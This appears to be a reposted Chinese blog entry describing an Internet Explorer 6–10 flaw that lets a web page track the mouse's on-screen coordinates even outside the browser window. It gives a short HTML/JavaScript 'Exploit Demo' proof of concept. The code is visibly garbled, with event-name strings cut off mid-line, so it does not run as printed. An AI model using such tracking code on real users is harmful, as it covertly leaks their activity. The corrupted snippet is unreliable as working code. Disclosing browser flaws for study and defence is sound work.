IE浏览器鼠标座标跟踪安全风险,通杀全版本---IE的最大特色

原創

huangyanxiong

2018-09-11 08:39

刚在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标座标位置，即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。

影响版本:IE6-10

测试：

在系统目录下新建一个html文件，代码如下：

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent(" function() {
      var detector = document.getElementById("detector");
      detector.attachEvent(" function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      setInterval(function () {
        detector.fireEvent("      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>

用IE打开新建的html文件

http://perlin.blog.51cto.com/1202304/1123397

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

IE浏览器鼠标座标跟踪安全风险,通杀全版本---IE的最大特色

python gdal 安装使用（Windows， python 3.6.8）

關於ueditor網絡連接錯誤問題

編譯libxml時的錯誤

linux系統中的Load對當前CPU工作量的度

X-UA-Compatible是針對ie8新加的一個設置

nginx的配置

Mac下配置sublime實現LaTeX

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結